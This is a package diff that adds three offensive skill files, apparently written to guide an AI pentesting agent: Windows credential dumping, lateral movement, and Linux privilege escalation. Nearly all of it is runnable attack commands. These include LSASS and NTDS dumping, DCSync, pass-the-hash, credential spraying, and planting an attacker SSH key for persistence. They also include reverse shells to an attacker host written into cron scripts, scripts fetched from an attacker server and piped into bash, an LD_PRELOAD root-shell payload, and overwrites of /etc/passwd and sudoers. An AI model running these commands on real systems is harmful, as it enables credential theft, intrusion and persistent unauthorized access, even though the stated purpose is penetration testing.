@aegis-scan/skills 0.5.0 → 0.5.2

package/skills/offensive/airecon-fork/postexploit-credential-dumping/SKILL.md

@@ -0,0 +1,249 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+# Windows Credential Dumping
+
+## Overview
+Comprehensive credential extraction from Windows systems: LSASS process dump,
+SAM/SYSTEM hive extraction, NTDS.dit for domain hashes, DCSync, and DPAPI secrets.
+
+## Prerequisites
+```bash
+# On attacker machine
+pip install impacket pypykatz
+# Tools needed on target (or run remotely):
+# mimikatz.exe, procdump.exe, nanodump.exe
+```
+
+## Phase 1: LSASS Process Dump
+
+### Method A: Procdump (Signed Microsoft Tool)
+```bash
+# On target (bypasses many AV solutions)
+.\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp
+
+# Download dump to attacker
+# On attacker — parse with pypykatz
+pypykatz lsa minidump /workspace/output/TARGET_lsass.dmp \
+  > /workspace/output/TARGET_lsass_creds.txt 2>&1
+```
+
+### Method B: Nanodump (OPSEC-friendly)
+```bash
+# Dump LSASS with fork technique (avoids suspicious access)
+.\nanodump.exe --fork --write C:\Windows\Temp\lsass.dmp
+
+# Dump via syscalls (EDR evasion)
+.\nanodump.exe --syscalls --fork --write C:\Windows\Temp\lsass.dmp
+
+# Parse on attacker
+pypykatz lsa minidump /workspace/output/TARGET_lsass.dmp \
+  > /workspace/output/TARGET_nanodump_creds.txt 2>&1
+```
+
+### Method C: Task Manager / Remote (No Tools)
+```bash
+# Via comsvcs.dll (LOLbin, requires admin)
+# On target powershell:
+# $lsasspid = (Get-Process lsass).Id
+# rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump $lsasspid C:\Windows\Temp\lsass.dmp full
+
+# Remotely via impacket (if creds available)
+python3 /usr/share/doc/python3-impacket/examples/lsassy.py \
+  DOMAIN/Administrator:'Password123'@TARGET \
+  -o /workspace/output/TARGET_lsassy_creds.txt
+```
+
+### Method D: Mimikatz
+```bash
+# Direct execution on target
+# mimikatz # privilege::debug
+# mimikatz # sekurlsa::logonpasswords
+# mimikatz # sekurlsa::wdigest
+# mimikatz # exit
+
+# Remote via impacket + mimikatz
+python3 /usr/share/doc/python3-impacket/examples/atexec.py \
+  DOMAIN/Administrator:'Password123'@TARGET \
+  'powershell -enc <BASE64_MIMIKATZ>'
+```
+
+## Phase 2: SAM & SYSTEM Hive Dump
+
+```bash
+# On target — save registry hives
+reg save HKLM\SAM C:\Windows\Temp\SAM
+reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
+reg save HKLM\SECURITY C:\Windows\Temp\SECURITY
+
+# On attacker — parse with secretsdump
+python3 /usr/share/doc/python3-impacket/examples/secretsdump.py \
+  -sam /workspace/output/TARGET_SAM \
+  -system /workspace/output/TARGET_SYSTEM \
+  -security /workspace/output/TARGET_SECURITY \
+  LOCAL -outputfile /workspace/output/TARGET_sam_hashes
+
+# Or remotely (no files needed)
+python3 /usr/share/doc/python3-impacket/examples/secretsdump.py \
+  DOMAIN/Administrator:'Password123'@TARGET \
+  -outputfile /workspace/output/TARGET_remote_hashes
+
+# Parse SAM hashes with pypykatz
+pypykatz registry --sam /workspace/output/TARGET_SAM \
+  --system /workspace/output/TARGET_SYSTEM \
+  --security /workspace/output/TARGET_SECURITY \
+  > /workspace/output/TARGET_pypykatz_sam.txt 2>&1
+```
+
+## Phase 3: NTDS.dit Extraction (Domain Controller)
+
+```bash
+# Method A: VSS shadow copy (requires DC access)
+# On DC:
+# vssadmin create shadow /for=C:
+# copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\
+# copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\
+
+# Method B: ntdsutil
+# ntdsutil "ac i ntds" "ifm" "create full C:\Temp\ntds" q q
+
+# Parse NTDS.dit on attacker
+python3 /usr/share/doc/python3-impacket/examples/secretsdump.py \
+  -ntds /workspace/output/TARGET_ntds.dit \
+  -system /workspace/output/TARGET_SYSTEM \
+  -hashes lmhash:nthash \
+  LOCAL -outputfile /workspace/output/TARGET_ntds_hashes
+
+# Count extracted hashes
+wc -l /workspace/output/TARGET_ntds_hashes.ntds
+```
+
+## Phase 4: DCSync Attack
+
+```bash
+# Requires Replication rights (Domain Admin / MSOL account)
+# Remote DCSync with impacket (no code on DC needed)
+python3 /usr/share/doc/python3-impacket/examples/secretsdump.py \
+  DOMAIN/Administrator:'Password123'@DC_IP \
+  -just-dc -outputfile /workspace/output/TARGET_dcsync
+
+# DCSync specific user
+python3 /usr/share/doc/python3-impacket/examples/secretsdump.py \
+  DOMAIN/Administrator:'Password123'@DC_IP \
+  -just-dc-user Administrator \
+  -outputfile /workspace/output/TARGET_dcsync_admin
+
+# DCSync with pass-the-hash
+python3 /usr/share/doc/python3-impacket/examples/secretsdump.py \
+  -hashes aad3b435b51404eeaad3b435b51404ee:<NTHASH> \
+  DOMAIN/Administrator@DC_IP \
+  -just-dc -outputfile /workspace/output/TARGET_dcsync_pth
+
+# Mimikatz DCSync (on target)
+# mimikatz # lsadump::dcsync /domain:DOMAIN /all /csv
+# mimikatz # lsadump::dcsync /domain:DOMAIN /user:krbtgt
+```
+
+## Phase 5: LSA Secrets
+
+```bash
+# Remote LSA secrets dump
+python3 /usr/share/doc/python3-impacket/examples/secretsdump.py \
+  DOMAIN/Administrator:'Password123'@TARGET \
+  -just-dc-ntlm -outputfile /workspace/output/TARGET_lsa_secrets
+
+# Includes: service account passwords, DPAPI master keys, cached domain credentials
+```
+
+## Phase 6: Cached Domain Credentials (DCC2)
+
+```bash
+# Extract cached logon credentials
+python3 /usr/share/doc/python3-impacket/examples/secretsdump.py \
+  DOMAIN/Administrator:'Password123'@TARGET \
+  -outputfile /workspace/output/TARGET_cached_creds
+
+# Crack DCC2 hashes (slow, use GPU)
+hashcat -m 2100 /workspace/output/TARGET_cached_creds.cached \
+  /usr/share/wordlists/rockyou.txt \
+  -o /workspace/output/TARGET_cached_cracked.txt
+```
+
+## Phase 7: Windows Credential Manager & DPAPI
+
+```bash
+# Dump Credential Manager via cmdkey
+# On target: cmdkey /list
+
+# DPAPI master key decryption (impacket)
+python3 /usr/share/doc/python3-impacket/examples/dpapi.py \
+  masterkey -file /workspace/output/TARGET_masterkey \
+  -sid <USER_SID> -password 'UserPassword'
+
+# Decrypt DPAPI blob
+python3 /usr/share/doc/python3-impacket/examples/dpapi.py \
+  credential -file /workspace/output/TARGET_cred_blob \
+  -key <MASTER_KEY_HEX>
+
+# Mimikatz DPAPI
+# mimikatz # dpapi::cred /in:C:\Users\user\AppData\Local\Microsoft\Credentials\<BLOB>
+# mimikatz # dpapi::masterkey /in:C:\Users\user\AppData\Roaming\Microsoft\Protect\<SID>\<GUID> /rpc
+```
+
+## Phase 8: Hash Cracking
+
+```bash
+# Crack NT hashes
+hashcat -m 1000 /workspace/output/TARGET_ntds_hashes.ntds \
+  /usr/share/wordlists/rockyou.txt \
+  -r /usr/share/hashcat/rules/best64.rule \
+  -o /workspace/output/TARGET_cracked_nt.txt
+
+# Crack NTLMv2 (captured via Responder)
+hashcat -m 5600 /workspace/output/TARGET_ntlmv2.txt \
+  /usr/share/wordlists/rockyou.txt \
+  -o /workspace/output/TARGET_cracked_ntlmv2.txt
+
+# Pass-the-Hash with cracked/dumped hashes
+python3 /usr/share/doc/python3-impacket/examples/psexec.py \
+  -hashes aad3b435b51404eeaad3b435b51404ee:<NTHASH> \
+  Administrator@TARGET cmd
+```
+
+## Report Template
+
+```
+Target: TARGET
+DC: <DC_HOSTNAME>
+Domain: <DOMAIN>
+
+## Credentials Dumped
+Total NT hashes from NTDS.dit: <count>
+Cracked hashes: <count>/<total>
+
+## High-Value Accounts
+- Administrator: <hash> [cracked: <password>]
+- krbtgt: <hash> (Golden Ticket capable)
+- Service accounts: <list>
+
+## Attack Paths Used
+1. Gained initial access via <method>
+2. Escalated to Domain Admin via <method>
+3. Performed DCSync to dump all hashes
+4. Cracked <X> passwords offline
+
+## Recommendations
+1. Enable Credential Guard (blocks LSASS dump)
+2. Enable Protected Users security group for privileged accounts
+3. Restrict Replication rights — audit DS-Replication ACL
+4. Implement tiered administration model
+5. Enable LAPS for local administrator accounts
+6. Monitor for suspicious LSASS access (Sysmon Event 10)
+```
+
+## Output Files
+- `/workspace/output/TARGET_lsass_creds.txt` — LSASS parsed credentials
+- `/workspace/output/TARGET_ntds_hashes.ntds` — All domain NT hashes
+- `/workspace/output/TARGET_dcsync.*` — DCSync results
+- `/workspace/output/TARGET_cracked_nt.txt` — Cracked passwords
+
+indicators: credential, dumping, lsass, dump, mimikatz, ntds, dcsync, sam, pypykatz, nanodump, procdump, secretsdump, dpapi, cached, domain, lsa, secrets, hash, cracking, passhash

package/skills/offensive/airecon-fork/postexploit-lateral-movement/SKILL.md

@@ -0,0 +1,194 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: lateral-movement
+description: Lateral movement techniques — pass-the-hash, pass-the-ticket, psexec, wmiexec, evil-winrm, crackmapexec spray, and moving through Windows/Linux networks after initial access
+---
+
+# Lateral Movement
+
+Lateral movement = use access on one system to compromise others. Core techniques: pass-the-hash, credential reuse, remote execution via SMB/WMI/WinRM.
+
+**Install:**
+```
+pip install impacket --break-system-packages
+pip install netexec --break-system-packages   # newer CrackMapExec
+sudo apt-get install -y evil-winrm crackmapexec impacket-scripts
+# evil-winrm: gem install evil-winrm
+```
+
+---
+
+## Credential Reuse — Spray First
+
+After getting one credential, try it everywhere:
+
+    # crackmapexec — spray across subnet:
+    crackmapexec smb 10.10.10.0/24 -u administrator -p 'Password123!'
+    crackmapexec smb 10.10.10.0/24 -u administrator -H <NTLM_hash>
+    crackmapexec winrm 10.10.10.0/24 -u administrator -p 'Password123!'
+    crackmapexec ssh 10.10.10.0/24 -u admin -p 'Password123!'
+
+    # Output: [+] = success, [-] = fail, [Pwn3d!] = admin access
+    # Continue-on-success to test all hosts:
+    crackmapexec smb 10.10.10.0/24 -u users.txt -p passwords.txt --continue-on-success
+
+---
+
+## Pass-the-Hash (PTH)
+
+NTLM authentication accepts hash directly — no cracking needed:
+
+    # psexec.py — full interactive SYSTEM shell via SMB:
+    psexec.py administrator@<target> -hashes :<NTLM_hash>
+    psexec.py domain/administrator@<target> -hashes :<NTLM_hash>
+
+    # wmiexec.py — WMI-based (stealthier, no service installation):
+    wmiexec.py administrator@<target> -hashes :<NTLM_hash>
+    wmiexec.py administrator@<target> -hashes :<NTLM_hash> -shell-type powershell
+
+    # smbexec.py — SMB-based (uses temp service like psexec):
+    smbexec.py administrator@<target> -hashes :<NTLM_hash>
+
+    # atexec.py — Task Scheduler:
+    atexec.py administrator@<target> "whoami" -hashes :<NTLM_hash>
+
+    # crackmapexec:
+    crackmapexec smb <target> -u administrator -H <NTLM_hash> -x "whoami"
+    crackmapexec smb <target> -u administrator -H <NTLM_hash> --sam   # Dump SAM
+    crackmapexec smb <target> -u administrator -H <NTLM_hash> --lsa   # LSA secrets
+
+---
+
+## WinRM — Evil-WinRM
+
+WinRM = Windows Remote Management (port 5985 HTTP, 5986 HTTPS). More interactive than psexec:
+
+    # Check if WinRM is open:
+    nmap -p 5985,5986 <target>
+
+    # Connect with password:
+    evil-winrm -i <target> -u administrator -p 'Password123!'
+
+    # Connect with NTLM hash (PTH):
+    evil-winrm -i <target> -u administrator -H <NTLM_hash>
+
+    # Connect with certificate (AD CS attack):
+    evil-winrm -i <target> -c cert.pem -k key.pem -S
+
+    # File upload/download:
+    evil-winrm> upload /home/kali/tools/winpeas.exe C:\Temp\winpeas.exe
+    evil-winrm> download C:\Temp\lsass.dmp /home/kali/lsass.dmp
+
+    # Run PS commands:
+    evil-winrm> Invoke-Mimikatz   # If PowerSploit loaded
+
+---
+
+## SSH Lateral Movement
+
+    # If SSH keys found on compromised Linux host:
+    find / -name "id_rsa" -o -name "id_ed25519" 2>/dev/null
+    cat /home/*/.ssh/id_rsa
+    cat /root/.ssh/id_rsa
+
+    # Test found keys against other hosts:
+    ssh -i /home/user/.ssh/id_rsa user@<other_host>
+
+    # known_hosts reveals other SSH targets:
+    cat /home/*/.ssh/known_hosts
+    cat /root/.ssh/known_hosts
+
+    # authorized_keys reveals which keys can access:
+    cat /home/*/.ssh/authorized_keys
+
+    # Add attacker key for persistence:
+    echo "ssh-rsa AAAA... attacker@kali" >> /root/.ssh/authorized_keys
+
+---
+
+## WMI Remote Execution
+
+    # wmiexec.py:
+    wmiexec.py 'domain/user:password'@<target>
+    wmiexec.py 'domain/user:password'@<target> "ipconfig /all"
+
+    # PowerShell WMI (from Windows foothold):
+    Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\Temp\out.txt" -ComputerName <target> -Credential (Get-Credential)
+
+---
+
+## DCOM Lateral Movement
+
+    # dcomexec.py (impacket):
+    dcomexec.py 'domain/user:password'@<target> "whoami"
+    dcomexec.py 'domain/user:password'@<target> "whoami" -hashes :<NTLM>
+
+---
+
+## Pass-the-Ticket (Kerberos)
+
+    # Import ticket to Linux session:
+    export KRB5CCNAME=/path/to/ticket.ccache
+
+    # Use with impacket tools:
+    smbexec.py -k -no-pass domain.local/administrator@<target>
+    psexec.py -k -no-pass domain.local/administrator@<target>
+    wmiexec.py -k -no-pass domain.local/administrator@<target>
+    secretsdump.py -k -no-pass domain.local/administrator@<target>
+
+---
+
+## Extracting Credentials for Continued Movement
+
+    # secretsdump — dump SAM, LSA, NTDS:
+    secretsdump.py administrator:password@<target>
+    secretsdump.py -hashes :<NTLM> administrator@<target>
+    # Outputs: local hashes + cached domain hashes + LSA secrets
+
+    # Dump domain controller NTDS.dit:
+    secretsdump.py -just-dc domain/administrator:password@<dc_ip>
+    # Gets ALL domain user hashes → crack for plaintext or PTH everything
+
+    # crackmapexec dump:
+    crackmapexec smb <target> -u admin -p pass --sam
+    crackmapexec smb <target> -u admin -p pass --lsa
+    crackmapexec smb <target> -u admin -p pass --ntds    # DC only
+
+---
+
+## Linux → Linux Lateral Movement
+
+    # Check /etc/hosts for other internal hosts:
+    cat /etc/hosts
+
+    # Check arp cache for reachable hosts:
+    arp -a
+    ip neigh
+
+    # SSH config reveals other targets:
+    cat /home/*/.ssh/config
+    cat /root/.ssh/config
+
+    # Check for reused passwords in config files:
+    grep -r "password" /var/www/ /opt/ /home/ 2>/dev/null | grep -v ".pyc\|Binary"
+
+    # Internal port scan from compromised host:
+    for port in 22 80 443 3306 5432 6379 27017; do
+        (echo >/dev/tcp/10.10.10.1/$port) 2>/dev/null && echo "$port open" || echo "$port closed"
+    done
+
+---
+
+## Pro Tips
+
+1. **Credential spray before anything else** — `crackmapexec smb 10.x.x.0/24` takes 2 minutes
+2. `wmiexec.py` is stealthier than `psexec.py` — no service installation, better for EDR evasion
+3. `evil-winrm` gives the most interactive shell — use for extended post-exploitation
+4. `secretsdump.py` on any admin-accessible host → all local hashes + LSA secrets
+5. SSH known_hosts on Linux → reveals internal network topology, reachable hosts
+6. `crackmapexec smb --ntds` on DC → every domain account hash → PTH everything in domain
+
+## Summary
+
+Lateral movement flow: credential reuse spray (`crackmapexec smb subnet`) → PTH via `wmiexec.py` or `evil-winrm` → dump more creds (`secretsdump.py`) → repeat. On Linux: harvest SSH keys → test against known_hosts targets → check config files for reused passwords. Goal: credentials and access accumulate exponentially each hop.

package/skills/offensive/airecon-fork/postexploit-linux-privesc/SKILL.md

@@ -0,0 +1,252 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: linux-privesc
+description: Linux privilege escalation — SUID/SGID abuse, sudo misconfigurations, writable cron jobs, capabilities, PATH hijacking, kernel exploits, and linpeas automation
+---
+
+# Linux Privilege Escalation
+
+Goal: get from low-privilege user → root. Systematic enumeration before exploitation.
+
+**Install:**
+```
+# linpeas: wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -O /home/pentester/tools/linpeas.sh && chmod +x /home/pentester/tools/linpeas.sh
+# OR serve and fetch on target:
+# Attacker: python3 -m http.server 8000 --directory /home/pentester/tools/
+# Target: curl http://<attacker>:8000/linpeas.sh | bash
+sudo apt-get install -y linux-exploit-suggester
+```
+
+---
+
+## Automated Enumeration — Start Here
+
+    # Run linpeas (comprehensive):
+    curl -s http://<attacker>/linpeas.sh | bash 2>/dev/null | tee /tmp/linpeas_out.txt
+
+    # linux-exploit-suggester:
+    curl -s http://<attacker>/linux-exploit-suggester.sh | bash
+
+    # Manual first checks:
+    id && whoami          # Current user + groups
+    sudo -l               # Sudo permissions
+    uname -a              # Kernel version + architecture
+    cat /etc/os-release   # OS version
+
+---
+
+## SUID / SGID Binaries
+
+SUID binaries run as the file owner (often root) regardless of who runs them:
+
+    # Find all SUID binaries:
+    find / -perm -4000 -type f 2>/dev/null
+    find / -perm -u=s -type f 2>/dev/null
+
+    # SGID:
+    find / -perm -2000 -type f 2>/dev/null
+
+    # Check GTFOBins for exploitation: https://gtfobins.github.io/
+    # Common exploitable SUID binaries:
+
+    # bash (SUID bash):
+    bash -p                   # -p preserves SUID UID → root shell
+
+    # find:
+    find . -exec /bin/sh -p \; -quit
+
+    # vim/vi:
+    vim -c ':!/bin/sh'
+
+    # nmap (old versions):
+    nmap --interactive
+    nmap> !sh
+
+    # cp (overwrite /etc/passwd):
+    cp /etc/passwd /tmp/passwd_backup
+    echo 'hacker:$1$xyz$hashedpassword:0:0:root:/root:/bin/bash' >> /etc/passwd
+    # Generate hash: openssl passwd -1 password
+
+    # python:
+    python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
+
+    # awk:
+    awk 'BEGIN {system("/bin/sh -p")}'
+
+    # less/more:
+    less /etc/passwd → !/bin/sh
+
+---
+
+## Sudo Misconfigurations
+
+    # Check sudo permissions:
+    sudo -l
+
+    # Common exploitable sudo rules:
+
+    # ALL=(ALL) NOPASSWD: /usr/bin/find
+    sudo find / -exec /bin/sh \; -quit
+
+    # ALL=(ALL) NOPASSWD: /usr/bin/vim
+    sudo vim -c ':!/bin/bash'
+
+    # ALL=(ALL) NOPASSWD: /usr/bin/python3
+    sudo python3 -c 'import pty; pty.spawn("/bin/bash")'
+
+    # ALL=(ALL) NOPASSWD: /usr/bin/less
+    sudo less /etc/passwd → !bash
+
+    # ALL=(ALL) NOPASSWD: /bin/cp
+    # Overwrite /etc/sudoers:
+    echo "ALL ALL=(ALL) NOPASSWD: ALL" | sudo cp /dev/stdin /etc/sudoers
+
+    # ALL=(user) NOPASSWD: /usr/bin/apt
+    sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh
+
+    # LD_PRELOAD bypass (if env_keep += LD_PRELOAD in /etc/sudoers):
+    # tools/priv_ld_preload.c:
+    cat > /tmp/shell.c << 'EOF'
+    #include <stdio.h>
+    #include <sys/types.h>
+    #include <stdlib.h>
+    void _init() { unsetenv("LD_PRELOAD"); setuid(0); setgid(0); system("/bin/bash"); }
+    EOF
+    gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles
+    sudo LD_PRELOAD=/tmp/shell.so <any_allowed_command>
+
+---
+
+## Writable Cron Jobs
+
+    # List cron jobs:
+    cat /etc/crontab
+    ls -la /etc/cron.*
+    crontab -l                    # Current user cron
+    cat /var/spool/cron/crontabs/*
+
+    # Find writable cron scripts:
+    find /etc/cron* -writable 2>/dev/null
+    find /var/spool/cron -writable 2>/dev/null
+
+    # If root cron runs /opt/backup.sh and it's writable:
+    echo "bash -i >& /dev/tcp/<attacker>/4444 0>&1" >> /opt/backup.sh
+    chmod +x /opt/backup.sh
+
+    # Writable PATH directory in cron (PATH hijacking):
+    # crontab has: PATH=/home/user:/usr/bin:/bin
+    # Create malicious binary in /home/user/ with same name as cron command:
+    echo '#!/bin/bash\nbash -i >& /dev/tcp/<attacker>/4444 0>&1' > /home/user/backup
+    chmod +x /home/user/backup
+
+---
+
+## Linux Capabilities
+
+Capabilities give processes specific root powers without full root:
+
+    # Find capabilities:
+    getcap -r / 2>/dev/null
+
+    # Common exploitable capabilities:
+    # cap_setuid = can change UID to 0 (root)
+    # cap_dac_override = bypass file read/write restrictions
+
+    # python3 cap_setuid:
+    python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
+
+    # perl cap_setuid:
+    perl -e 'use POSIX qw(setuid); setuid(0); exec "/bin/bash";'
+
+    # openssl cap_read (reads any file):
+    openssl enc -in /etc/shadow
+
+---
+
+## Writable /etc/passwd
+
+If /etc/passwd is world-writable:
+
+    # Add root user with known password:
+    # Generate password hash:
+    openssl passwd -1 "hacker123"   # MD5 hash
+    # Append to /etc/passwd:
+    echo 'hacker:$1$xyz$HASH:0:0:root:/root:/bin/bash' >> /etc/passwd
+    su hacker   # enter "hacker123"
+
+---
+
+## PATH Hijacking
+
+If a SUID binary calls external commands without full path:
+
+    # Check what commands SUID binary calls:
+    strings /usr/bin/vulnerable_suid | grep -v "^/"
+    # If calls "service" without full path:
+    echo '/bin/bash -p' > /tmp/service
+    chmod +x /tmp/service
+    export PATH=/tmp:$PATH
+    /usr/bin/vulnerable_suid   # runs /tmp/service as root
+
+---
+
+## Kernel Exploits
+
+    # Get kernel version:
+    uname -r
+    uname -a
+
+    # Search for exploits:
+    linux-exploit-suggester.sh -k $(uname -r)
+    web_search("$(uname -r) local privilege escalation exploit")
+
+    # Common exploits:
+    # CVE-2021-4034 — PwnKit (polkit pkexec) — affects most Linux distros
+    # CVE-2022-0847 — Dirty Pipe (Linux 5.8-5.16.11)
+    # CVE-2021-3493 — Ubuntu OverlayFS
+    # CVE-2016-5195 — Dirty COW (Linux 2.6.22-4.8.3)
+
+    # DirtyPipe check:
+    uname -r  # 5.8.0 - 5.16.11 = vulnerable
+    # Exploit: git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits /home/pentester/tools/dirtypipe
+    gcc -o /home/pentester/tools/dirtypipe/exploit1 /home/pentester/tools/dirtypipe/exploit-1.c
+    /home/pentester/tools/dirtypipe/exploit1
+
+---
+
+## NFS No_Root_Squash
+
+    # Check NFS exports:
+    cat /etc/exports
+    # no_root_squash means mounting remotely as root keeps root privileges
+
+    # From attacker machine:
+    showmount -e <target>
+    sudo mount -t nfs <target>:/share /mnt/nfs -nolock
+    cp /bin/bash /mnt/nfs/bash
+    chmod +s /mnt/nfs/bash
+    # On target:
+    /tmp/nfsmount/bash -p   # → root shell
+
+---
+
+## Pro Tips
+
+1. **Always run linpeas first** — it finds 90% of misconfigurations automatically
+2. `sudo -l` first — `NOPASSWD` sudo rules are the easiest privesc path
+3. GTFOBins (https://gtfobins.github.io/) — lists exploitation methods for every SUID binary
+4. Writable cron scripts running as root = guaranteed privesc if cron runs frequently
+5. Capabilities check (`getcap -r /`) finds non-obvious privilege paths missed by linpeas
+6. PwnKit (CVE-2021-4034) affects ALL Linux distros with polkit before Jan 2022 — check pkexec
+
+## Summary
+
+Linux privesc checklist:
+1. `sudo -l` → NOPASSWD rules
+2. `find / -perm -4000` → SUID binaries → GTFOBins
+3. `cat /etc/crontab` → writable scripts in root crons
+4. `getcap -r /` → dangerous capabilities
+5. `uname -r` → kernel exploits (PwnKit, DirtyPipe)
+6. `cat /etc/exports` → NFS no_root_squash
+7. Run linpeas for comprehensive sweep